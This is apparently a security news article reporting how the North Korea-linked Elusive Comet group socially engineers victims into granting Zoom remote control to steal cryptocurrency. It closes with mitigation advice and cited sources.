A North Korean hacking group known as Elusive Comet has been exploiting Zoom’s remote control feature to steal cryptocurrency from targeted victims. The attackers use social engineering tactics to trick users into granting them access to their machines, allowing them to deploy malware and exfiltrate sensitive data. This campaign has been linked to millions in stolen funds, including a $1.5 billion heist from Bybit in February 20251.
Attack Methodology and Tactics
The attackers pose as venture capitalists, podcast hosts, or journalists to lure victims into joining Zoom calls. Once connected, they abuse Zoom’s remote control feature—enabled by default—to request screen-sharing permissions. The hackers spoof the display name as “Zoom” to make the request appear legitimate2. Once granted access, they deploy infostealers and remote access trojans (RATs) to harvest credentials, browser sessions, and cryptocurrency seed phrases. The campaign primarily targets cryptocurrency traders, financial professionals, and enterprises with high-value digital assets.
According to SecurityWeek, the group uses phishing lures with Calendly and Zoom links to schedule meetings. The attackers also leverage macOS accessibility permissions and UI ambiguity to escalate privileges3. Trail of Bits researchers confirmed that the hackers impersonated Bloomberg producers in some cases, further demonstrating their sophisticated social engineering tactics.
Mitigation and Defense Strategies
Security experts recommend disabling Zoom’s remote control feature at the administrative level to prevent abuse. Additional defensive measures include:
- Training users to verify permission prompts before granting access
- Monitoring for unusual Zoom process activity in endpoint detection systems
- Implementing technical controls to block remote control functionality
BleepingComputer reports that the campaign has a global reach, with Japanese brokers losing $700 million to similar tactics4. The attacks have been linked to the Lazarus Group, a known North Korean state-sponsored threat actor5.
Technical Analysis of the Exploit Chain
The attack chain relies heavily on social engineering rather than technical vulnerabilities in Zoom’s software. However, the default-enabled remote control feature provides an easy avenue for exploitation. CyberPress analysis suggests the group uses stolen certificates and keys in parallel attacks to maintain persistence6.
Security teams should pay particular attention to Zoom processes spawning unusual child processes or making unexpected network connections. The attackers have been observed deploying clipboard hijackers to intercept cryptocurrency transactions, making behavioral detection crucial for defense.
This campaign highlights the growing trend of attackers abusing legitimate collaboration tools for malicious purposes. As remote work continues to be prevalent, organizations must balance functionality with security when configuring these platforms.
References
- “North Korean cryptocurrency thieves caught hijacking Zoom remote control feature,” SecurityWeek, [Online]. Available: https://www.securityweek.com/north-korean-cryptocurrency-thieves-caught-hijacking-zoom-remote-control-feature/
- “Mitigating Elusive Comet Zoom Remote Control Attacks,” Trail of Bits, Apr. 17, 2025. [Online]. Available: https://blog.trailofbits.com/2025/04/17/mitigating-elusive-comet-zoom-remote-control-attacks/
- “Hackers abuse Zoom remote control feature for crypto-theft attacks,” BleepingComputer, [Online]. Available: https://www.bleepingcomputer.com/news/security/hackers-abuse-zoom-remote-control-feature-for-crypto-theft-attacks/
- “Risky Bulletin: Zoom has a remote control feature and crypto thieves are abusing it,” Risky Biz, [Online]. Available: https://news.risky.biz/risky-bulletin-zoom-has-a-remote-control-feature-and-crypto-thieves-are-abusing-it/
- “Hackers Abuse Zoom’s Remote Control,” GBHackers, [Online]. Available: https://gbhackers.com/hackers-abuse-zooms-remote-control/
- “Zoom Remote Control Exploited,” CyberPress, [Online]. Available: https://cyberpress.org/zoom-remote-control-exploited/
